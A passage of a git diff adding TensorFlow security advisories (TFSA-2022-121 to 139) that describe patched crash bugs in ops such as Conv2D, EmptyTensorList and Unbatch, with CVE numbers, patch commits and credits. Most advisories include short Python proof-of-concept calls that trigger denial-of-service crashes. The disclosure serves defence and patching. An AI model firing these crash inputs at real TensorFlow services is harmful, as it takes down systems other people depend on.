+padding = 'VALID'
+data_format = 'NCHW'
+
+tf.raw_ops.MaxPool(input=input, ksize=ksize, strides=strides, padding=padding, data_format=data_format)
+```
+
+### Patches
+We have patched the issue in GitHub commit [32d7bd3defd134f21a4e344c8dfd40099aaf6b18](https://github.com/tensorflow/tensorflow/commit/32d7bd3defd134f21a4e344c8dfd40099aaf6b18).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Jingyi Shi.
diff --git a/tensorflow/security/advisory/tfsa-2022-121.md b/tensorflow/security/advisory/tfsa-2022-121.md
new file mode 100644
index 0000000..14e2fde
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-121.md
@@ -0,0 +1,37 @@
+## TFSA-2022-121: `CHECK` fail in `Conv2DBackpropInput`
+
+### CVE Number
+CVE-2022-35999
+
+### Impact
+When `Conv2DBackpropInput` receives empty `out_backprop` inputs (e.g. `[3, 1, 0, 1]`), the current CPU/GPU kernels `CHECK` fail (one with dnnl, the other with cudnn). This can be used to trigger a denial of service attack.
+```python
+import tensorflow as tf
+import numpy as np
+input_sizes = [3, 1, 1, 2]
+filter = np.ones([1, 3, 2, 3])
+out_backprop = np.ones([3, 1, 0, 3])
+strides = [1, 1, 2, 1]
+padding = 'VALID'
+
+tf.raw_ops.Conv2DBackpropInput(
+ input_sizes = input_sizes,
+ filter = filter,
+ out_backprop = out_backprop,
+ strides = strides,
+ padding = padding
+)
+```
+
+### Patches
+We have patched the issue in GitHub commit [27a65a43cf763897fecfa5cdb5cc653fc5dd0346](https://github.com/tensorflow/tensorflow/commit/27a65a43cf763897fecfa5cdb5cc653fc5dd0346).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Jingyi Shi.
diff --git a/tensorflow/security/advisory/tfsa-2022-122.md b/tensorflow/security/advisory/tfsa-2022-122.md
new file mode 100644
index 0000000..0ddc3ef
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-122.md
@@ -0,0 +1,25 @@
+## TFSA-2022-122: `CHECK` fail in `EmptyTensorList`
+
+### CVE Number
+CVE-2022-35998
+
+### Impact
+If `EmptyTensorList` receives an input `element_shape` with more than one dimension, it gives a `CHECK` fail that can be used to trigger a denial of service attack.
+```python
+import tensorflow as tf
+
+tf.raw_ops.EmptyTensorList(element_shape=tf.ones(dtype=tf.int32, shape=[1, 0]), max_num_elements=tf.constant(1),element_dtype=tf.int32)
+```
+
+### Patches
+We have patched the issue in GitHub commit [c8ba76d48567aed347508e0552a257641931024d](https://github.com/tensorflow/tensorflow/commit/c8ba76d48567aed347508e0552a257641931024d).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Kang Hong Jin.
diff --git a/tensorflow/security/advisory/tfsa-2022-123.md b/tensorflow/security/advisory/tfsa-2022-123.md
new file mode 100644
index 0000000..de19c30
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-123.md
@@ -0,0 +1,25 @@
+## TFSA-2022-123: `CHECK` fail in `tf.sparse.cross`
+
+### CVE Number
+CVE-2022-35997
+
+### Impact
+If `tf.sparse.cross` receives an input `separator` that is not a scalar, it gives a `CHECK` fail that can be used to trigger a denial of service attack.
+```python
+import tensorflow as tf
+
+tf.sparse.cross(inputs=[],name='a',separator=tf.constant(['a', 'b'],dtype=tf.string))
+```
+
+### Patches
+We have patched the issue in GitHub commit [83dcb4dbfa094e33db084e97c4d0531a559e0ebf](https://github.com/tensorflow/tensorflow/commit/83dcb4dbfa094e33db084e97c4d0531a559e0ebf).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Kang Hong Jin.
diff --git a/tensorflow/security/advisory/tfsa-2022-124.md b/tensorflow/security/advisory/tfsa-2022-124.md
new file mode 100644
index 0000000..f6822dfa
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-124.md
@@ -0,0 +1,39 @@
+## TFSA-2022-124: Floating point exception in `Conv2D`
+
+### CVE Number
+CVE-2022-35996
+
+### Impact
+If `Conv2D` is given empty `input` and the `filter` and `padding` sizes are valid, the output is all-zeros. This causes division-by-zero floating point exceptions that can be used to trigger a denial of service attack.
+```python
+import tensorflow as tf
+import numpy as np
+with tf.device("CPU"): # also can be triggerred on GPU
+ input = np.ones([1, 0, 2, 1])
+ filter = np.ones([1, 1, 1, 1])
+ strides = ([1, 1, 1, 1])
+ padding = "EXPLICIT"
+ explicit_paddings = [0 , 0, 1, 1, 1, 1, 0, 0]
+ data_format = "NHWC"
+ res = tf.raw_ops.Conv2D(
+ input=input,
+ filter=filter,
+ strides=strides,
+ padding=padding,
+ explicit_paddings=explicit_paddings,
+ data_format=data_format,
+ )
+```
+
+### Patches
+We have patched the issue in GitHub commit [611d80db29dd7b0cfb755772c69d60ae5bca05f9](https://github.com/tensorflow/tensorflow/commit/611d80db29dd7b0cfb755772c69d60ae5bca05f9).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by Jingyi Shi.
diff --git a/tensorflow/security/advisory/tfsa-2022-125.md b/tensorflow/security/advisory/tfsa-2022-125.md
new file mode 100644
index 0000000..f8a30da
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-125.md
@@ -0,0 +1,30 @@
+## TFSA-2022-125: `CHECK` fail in `AudioSummaryV2`
+
+### CVE Number
+CVE-2022-35995
+
+### Impact
+When `AudioSummaryV2` receives an input `sample_rate` with more than one element, it gives a `CHECK` fails that can be used to trigger a denial of service attack.
+```python
+import tensorflow as tf
+arg_0=''
+arg_1=tf.random.uniform(shape=(1,1), dtype=tf.float32, maxval=None)
+arg_2=tf.random.uniform(shape=(2,1), dtype=tf.float32, maxval=None)
+arg_3=3
+arg_4=''
+tf.raw_ops.AudioSummaryV2(tag=arg_0, tensor=arg_1, sample_rate=arg_2,
+ max_outputs=arg_3, name=arg_4)
+```
+
+### Patches
+We have patched the issue in GitHub commit [bf6b45244992e2ee543c258e519489659c99fb7f](https://github.com/tensorflow/tensorflow/commit/bf6b45244992e2ee543c258e519489659c99fb7f).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology.
diff --git a/tensorflow/security/advisory/tfsa-2022-126.md b/tensorflow/security/advisory/tfsa-2022-126.md
new file mode 100644
index 0000000..44b6334
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-126.md
@@ -0,0 +1,34 @@
+## TFSA-2022-126: `CHECK` fail in `CollectiveGather`
+
+### CVE Number
+CVE-2022-35994
+
+### Impact
+When `CollectiveGather` receives an scalar input `input`, it gives a `CHECK` fails that can be used to trigger a denial of service attack.
+```python
+import tensorflow as tf
+arg_0=1
+arg_1=1
+arg_2=1
+arg_3=1
+arg_4=(3, 3,3)
+arg_5='auto'
+arg_6=0
+arg_7=''
+tf.raw_ops.CollectiveGather(input=arg_0, group_size=arg_1, group_key=arg_2,
+ instance_key=arg_3, shape=arg_4,
+ communication_hint=arg_5, timeout_seconds=arg_6, name=arg_7)
+```
+
+### Patches
+We have patched the issue in GitHub commit [c1f491817dec39a26be3c574e86a88c30f3c4770](https://github.com/tensorflow/tensorflow/commit/c1f491817dec39a26be3c574e86a88c30f3c4770).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology.
diff --git a/tensorflow/security/advisory/tfsa-2022-127.md b/tensorflow/security/advisory/tfsa-2022-127.md
new file mode 100644
index 0000000..c455f64
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-127.md
@@ -0,0 +1,30 @@
+## TFSA-2022-127: `CHECK` fail in `SetSize`
+
+### CVE Number
+CVE-2022-35993
+
+### Impact
+When `SetSize` receives an input `set_shape` that is not a 1D tensor, it gives a `CHECK` fails that can be used to trigger a denial of service attack.
+```python
+import tensorflow as tf
+arg_0=1
+arg_1=[1,1]
+arg_2=1
+arg_3=True
+arg_4=''
+tf.raw_ops.SetSize(set_indices=arg_0, set_values=arg_1, set_shape=arg_2,
+ validate_indices=arg_3, name=arg_4)
+```
+
+### Patches
+We have patched the issue in GitHub commit [cf70b79d2662c0d3c6af74583641e345fc939467](https://github.com/tensorflow/tensorflow/commit/cf70b79d2662c0d3c6af74583641e345fc939467).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology.
diff --git a/tensorflow/security/advisory/tfsa-2022-128.md b/tensorflow/security/advisory/tfsa-2022-128.md
new file mode 100644
index 0000000..b682bd2
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-128.md
@@ -0,0 +1,27 @@
+## TFSA-2022-128: `CHECK` fail in `TensorListFromTensor`
+
+### CVE Number
+CVE-2022-35992
+
+### Impact
+When `TensorListFromTensor` receives an `element_shape` of a rank greater than one, it gives a `CHECK` fail that can trigger a denial of service attack.
+```python
+import tensorflow as tf
+arg_0=tf.random.uniform(shape=(6, 6, 2), dtype=tf.bfloat16, maxval=None)
+arg_1=tf.random.uniform(shape=(6, 9, 1, 3), dtype=tf.int64, maxval=65536)
+arg_2=''
+tf.raw_ops.TensorListFromTensor(tensor=arg_0, element_shape=arg_1, name=arg_2)
+```
+
+### Patches
+We have patched the issue in GitHub commit [3db59a042a38f4338aa207922fa2f476e000a6ee](https://github.com/tensorflow/tensorflow/commit/3db59a042a38f4338aa207922fa2f476e000a6ee).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology.
diff --git a/tensorflow/security/advisory/tfsa-2022-129.md b/tensorflow/security/advisory/tfsa-2022-129.md
new file mode 100644
index 0000000..786c2e4
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-129.md
@@ -0,0 +1,29 @@
+## TFSA-2022-129: `CHECK` fail in `TensorListScatter` and `TensorListScatterV2`
+
+### CVE Number
+CVE-2022-35991
+
+### Impact
+When `TensorListScatter` and `TensorListScatterV2` receive an `element_shape` of a rank greater than one, they give a `CHECK` fail that can trigger a denial of service attack.
+```python
+import tensorflow as tf
+arg_0=tf.random.uniform(shape=(2, 2, 2), dtype=tf.float16, maxval=None)
+arg_1=tf.random.uniform(shape=(2, 2, 2), dtype=tf.int32, maxval=65536)
+arg_2=tf.random.uniform(shape=(2, 2, 2), dtype=tf.int32, maxval=65536)
+arg_3=''
+tf.raw_ops.TensorListScatter(tensor=arg_0, indices=arg_1,
+element_shape=arg_2, name=arg_3)
+```
+
+### Patches
+We have patched the issue in GitHub commit [bb03fdf4aae944ab2e4b35c7daa051068a8b7f61](https://github.com/tensorflow/tensorflow/commit/bb03fdf4aae944ab2e4b35c7daa051068a8b7f61).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology.
diff --git a/tensorflow/security/advisory/tfsa-2022-130.md b/tensorflow/security/advisory/tfsa-2022-130.md
new file mode 100644
index 0000000..7b522ec
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-130.md
@@ -0,0 +1,35 @@
+## TFSA-2022-130: `CHECK` fail in `FakeQuantWithMinMaxVarsPerChannelGradient`
+
+### CVE Number
+CVE-2022-35990
+
+### Impact
+When `tf.quantization.fake_quant_with_min_max_vars_per_channel_gradient` receives input `min` or `max` of rank other than 1, it gives a `CHECK` fail that can trigger a denial of service attack.
+```python
+import tensorflow as tf
+arg_0=tf.random.uniform(shape=(1,1), dtype=tf.float32, maxval=None)
+arg_1=tf.random.uniform(shape=(1,1), dtype=tf.float32, maxval=None)
+arg_2=tf.random.uniform(shape=(1,1), dtype=tf.float32, maxval=None)
+arg_3=tf.random.uniform(shape=(1,1), dtype=tf.float32, maxval=None)
+arg_4=8
+arg_5=False
+arg_6=None
+tf.quantization.fake_quant_with_min_max_vars_per_channel_gradient(gradients=arg_0,
+ inputs=arg_1, min=arg_2, max=arg_3, num_bits=arg_4,
+ narrow_range=arg_5, name=arg_6)
+```
+
+### Patches
+We have patched the issue in GitHub commit [f3cf67ac5705f4f04721d15e485e192bb319feed](https://github.com/tensorflow/tensorflow/commit/f3cf67ac5705f4f04721d15e485e192bb319feed).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by
+ - 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology
+ - Neophytos Christou, Secure Systems Labs, Brown University
diff --git a/tensorflow/security/advisory/tfsa-2022-131.md b/tensorflow/security/advisory/tfsa-2022-131.md
new file mode 100644
index 0000000..7721189
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-131.md
@@ -0,0 +1,35 @@
+## TFSA-2022-131: `CHECK` fail in `FakeQuantWithMinMaxVarsGradient`
+
+### CVE Number
+CVE-2022-36005
+
+### Impact
+When `tf.quantization.fake_quant_with_min_max_vars_gradient` receives input `min` or `max` that is nonscalar, it gives a `CHECK` fail that can trigger a denial of service attack.
+```python
+import tensorflow as tf
+import numpy as np
+arg_0=tf.constant(value=np.random.random(size=(2, 2)), shape=(2, 2), dtype=tf.float32)
+arg_1=tf.constant(value=np.random.random(size=(2, 2)), shape=(2, 2), dtype=tf.float32)
+arg_2=tf.constant(value=np.random.random(size=(2, 2)), shape=(2, 2), dtype=tf.float32)
+arg_3=tf.constant(value=np.random.random(size=(2, 2)), shape=(2, 2), dtype=tf.float32)
+arg_4=8
+arg_5=False
+arg_6=''
+tf.quantization.fake_quant_with_min_max_vars_gradient(gradients=arg_0, inputs=arg_1,
+min=arg_2, max=arg_3, num_bits=arg_4, narrow_range=arg_5, name=arg_6)
+```
+
+### Patches
+We have patched the issue in GitHub commit [f3cf67ac5705f4f04721d15e485e192bb319feed](https://github.com/tensorflow/tensorflow/commit/f3cf67ac5705f4f04721d15e485e192bb319feed).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by
+ - 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology
+ - Neophytos Christou, Secure Systems Labs, Brown University
diff --git a/tensorflow/security/advisory/tfsa-2022-132.md b/tensorflow/security/advisory/tfsa-2022-132.md
new file mode 100644
index 0000000..1057be6
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-132.md
@@ -0,0 +1,30 @@
+## TFSA-2022-132: `CHECK` fail in `tf.random.gamma`
+
+### CVE Number
+CVE-2022-36004
+
+### Impact
+When `tf.random.gamma` receives large input shape and rates, it gives a `CHECK` fail that can trigger a denial of service attack.
+```python
+import tensorflow as tf
+arg_0=tf.random.uniform(shape=(4,), dtype=tf.int32, maxval=65536)
+arg_1=tf.random.uniform(shape=(4, 4), dtype=tf.float64, maxval=None)
+arg_2=tf.random.uniform(shape=(4, 4, 4, 4, 4), dtype=tf.float64, maxval=None)
+arg_3=tf.float64
+arg_4=48
+arg_5='None'
+tf.random.gamma(shape=arg_0, alpha=arg_1, beta=arg_2, dtype=arg_3, seed=arg_4, name=arg_5)
+```
+
+### Patches
+We have patched the issue in GitHub commit [552bfced6ce4809db5f3ca305f60ff80dd40c5a3](https://github.com/tensorflow/tensorflow/commit/552bfced6ce4809db5f3ca305f60ff80dd40c5a3).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology.
diff --git a/tensorflow/security/advisory/tfsa-2022-133.md b/tensorflow/security/advisory/tfsa-2022-133.md
new file mode 100644
index 0000000..ba93bbf
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-133.md
@@ -0,0 +1,31 @@
+## TFSA-2022-133: `CHECK` fail in `RandomPoissonV2`
+
+### CVE Number
+CVE-2022-36003
+
+### Impact
+When `RandomPoissonV2` receives large input shape and rates, it gives a `CHECK` fail that can trigger a denial of service attack.
+```python
+import tensorflow as tf
+arg_0=tf.random.uniform(shape=(4,), dtype=tf.int32, maxval=65536)
+arg_1=tf.random.uniform(shape=(4, 4, 4, 4, 4), dtype=tf.float32, maxval=None)
+arg_2=0
+arg_3=0
+arg_4=tf.int32
+arg_5=None
+tf.raw_ops.RandomPoissonV2(shape=arg_0, rate=arg_1, seed=arg_2,
+ seed2=arg_3, dtype=arg_4, name=arg_5)
+```
+
+### Patches
+We have patched the issue in GitHub commit [552bfced6ce4809db5f3ca305f60ff80dd40c5a3](https://github.com/tensorflow/tensorflow/commit/552bfced6ce4809db5f3ca305f60ff80dd40c5a3).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology.
diff --git a/tensorflow/security/advisory/tfsa-2022-134.md b/tensorflow/security/advisory/tfsa-2022-134.md
new file mode 100644
index 0000000..3b28f43
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-134.md
@@ -0,0 +1,32 @@
+## TFSA-2022-134: `CHECK` fail in `Unbatch`
+
+### CVE Number
+CVE-2022-36002
+
+### Impact
+When `Unbatch` receives a nonscalar input `id`, it gives a `CHECK` fail that can trigger a denial of service attack.
+```python
+import tensorflow as tf
+import numpy as np
+arg_0=tf.constant(value=np.random.random(size=(3, 3, 1)), dtype=tf.float64)
+arg_1=tf.constant(value=np.random.randint(0,100,size=(3, 3, 1)), dtype=tf.int64)
+arg_2=tf.constant(value=np.random.randint(0,100,size=(3, 3, 1)), dtype=tf.int64)
+arg_3=47
+arg_4=''
+arg_5=''
+tf.raw_ops.Unbatch(batched_tensor=arg_0, batch_index=arg_1, id=arg_2,
+ timeout_micros=arg_3, container=arg_4, shared_name=arg_5)
+```
+
+### Patches
+We have patched the issue in GitHub commit [4419d10d576adefa36b0e0a9425d2569f7c0189f](https://github.com/tensorflow/tensorflow/commit/4419d10d576adefa36b0e0a9425d2569f7c0189f).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology.
diff --git a/tensorflow/security/advisory/tfsa-2022-135.md b/tensorflow/security/advisory/tfsa-2022-135.md
new file mode 100644
index 0000000..b089af0
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-135.md
@@ -0,0 +1,28 @@
+## TFSA-2022-135: `CHECK` fail in `DrawBoundingBoxes`
+
+### CVE Number
+CVE-2022-36001
+
+### Impact
+When `DrawBoundingBoxes` receives an input `boxes` that is not of dtype `float`, it gives a `CHECK` fail that can trigger a denial of service attack.
+```python
+import tensorflow as tf
+import numpy as np
+arg_0=tf.constant(value=np.random.random(size=(1, 3, 2, 3)), shape=(1, 3, 2, 3), dtype=tf.half)
+arg_1=tf.constant(value=np.random.random(size=(1, 2, 4)), shape=(1, 2, 4), dtype=tf.float32)
+arg_2=''
+tf.raw_ops.DrawBoundingBoxes(images=arg_0, boxes=arg_1, name=arg_2)
+```
+
+### Patches
+We have patched the issue in GitHub commit [da0d65cdc1270038e72157ba35bf74b85d9bda11](https://github.com/tensorflow/tensorflow/commit/da0d65cdc1270038e72157ba35bf74b85d9bda11).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology.
diff --git a/tensorflow/security/advisory/tfsa-2022-136.md b/tensorflow/security/advisory/tfsa-2022-136.md
new file mode 100644
index 0000000..16b63ac
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-136.md
@@ -0,0 +1,29 @@
+## TFSA-2022-136: `CHECK` fail in `Eig`
+
+### CVE Number
+CVE-2022-36000
+
+### Impact
+`Eig` can be fed an incorrect `Tout` input, resulting in a `CHECK` fail that can trigger a denial of service attack.
+```python
+import tensorflow as tf
+import numpy as np
+arg_0=tf.constant(value=np.random.random(size=(2, 2)), shape=(2, 2), dtype=tf.float32)
+arg_1=tf.complex128
+arg_2=True
+arg_3=''
+tf.raw_ops.Eig(input=arg_0, Tout=arg_1, compute_v=arg_2, name=arg_3)
+```
+
+### Patches
+We have patched the issue in GitHub commit [aed36912609fc07229b4d0a7b44f3f48efc00fd0](https://github.com/tensorflow/tensorflow/commit/aed36912609fc07229b4d0a7b44f3f48efc00fd0).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+
+### Attribution
+This vulnerability has been reported by 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology.
diff --git a/tensorflow/security/advisory/tfsa-2022-137.md b/tensorflow/security/advisory/tfsa-2022-137.md
new file mode 100644
index 0000000..84de6da
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-137.md
@@ -0,0 +1,28 @@
+## TFSA-2022-137: Null dereference on MLIR on empty function attributes
+
+### CVE Number
+CVE-2022-36011
+
+### Impact
+When [`mlir::tfg::ConvertGenericFunctionToFunctionDef`](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/core/ir/importexport/functiondef_import.cc) is given empty function attributes, it gives a null dereference.
+```cpp
+// Import the function attributes with a `tf.` prefix to match the current
+// infrastructure expectations.
+for (const auto& namedAttr : func.attr()) {
+ const std::string& name = "tf." + namedAttr.first;
+ const AttrValue& tf_attr = namedAttr.second;
+ TF_ASSIGN_OR_RETURN(Attribute attr,
+ ConvertAttributeValue(tf_attr, builder, tfgDialect));
+ attrs.append(name, attr);
+}
+```
+If `namedAttr.first` is empty, it will crash.
+
+### Patches
+We have patched the issue in GitHub commit [1cf45b831eeb0cab8655c9c7c5d06ec6f45fc41b](https://github.com/tensorflow/tensorflow/commit/1cf45b831eeb0cab8655c9c7c5d06ec6f45fc41b).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
diff --git a/tensorflow/security/advisory/tfsa-2022-138.md b/tensorflow/security/advisory/tfsa-2022-138.md
new file mode 100644
index 0000000..279de96
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-138.md
@@ -0,0 +1,54 @@
+## TFSA-2022-138: Assertion fail on MLIR empty edge names
+
+### CVE Number
+CVE-2022-36012
+
+### Impact
+When [`mlir::tfg::ConvertGenericFunctionToFunctionDef`](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/core/ir/importexport/functiondef_import.cc) is given empty function attributes, it crashes.
+```cpp
+// We pre-allocate the array of operands and populate it using the
+// `output_name_to_position` and `control_output_to_position` populated
+// previously.
+SmallVector<Value> ret_vals(func.ret_size() + func.control_ret_size(),
+ Value());
+for (const auto& ret_val : func.ret()) {
+ auto position = output_name_to_position.find(ret_val.first);
+ if (position == output_name_to_position.end())
+ return InvalidArgument(
+ "Can't import function, returned value references unknown output "
+ "argument ",
+ ret_val.first);
+ ret_vals[position->second] =
+ value_manager.GetValueOrCreatePlaceholder(ret_val.second);
+}
+for (const auto& ret_val : func.control_ret()) {
+ auto position = control_output_to_position.find(ret_val.first);
+ if (position == control_output_to_position.end())
+ return InvalidArgument(
+ "Can't import function, returned value references unknown output "
+ "argument ",
+ ret_val.first);
+ Value result = value_manager.GetValueOrCreatePlaceholder(
+ (Twine("^") + ret_val.second).str());
+```
+`ret_val.second` cannot be empty. Neither can `input`.
+```cpp
+// Process every node and create a matching MLIR operation
+for (const NodeDef& node : nodes) {
+ if (node.op().empty()) return InvalidArgument("empty op type");
+ OperationState state(unknown_loc, absl::StrCat("tfg.", node.op()));
+ // Fetch the inputs, creating placeholder if an input hasn't been visited.
+ for (const std::string& input : node.input())
+ state.operands.push_back(
+ value_manager.GetValueOrCreatePlaceholder(input));
+```
+
+
+### Patches
+We have patched the issue in GitHub commit [ad069af92392efee1418c48ff561fd3070a03d7b](https://github.com/tensorflow/tensorflow/commit/ad069af92392efee1418c48ff561fd3070a03d7b).
+
+The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
+
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
diff --git a/tensorflow/security/advisory/tfsa-2022-139.md b/tensorflow/security/advisory/tfsa-2022-139.md
new file mode 100644
index 0000000..e069b61
--- /dev/null
+++ b/tensorflow/security/advisory/tfsa-2022-139.md
@@ -0,0 +1,37 @@
+## TFSA-2022-139: Null-dereference in `mlir::tfg::GraphDefImporter::ConvertNodeDef`
+
+### CVE Number
+CVE-2022-36013
+
+### Impact
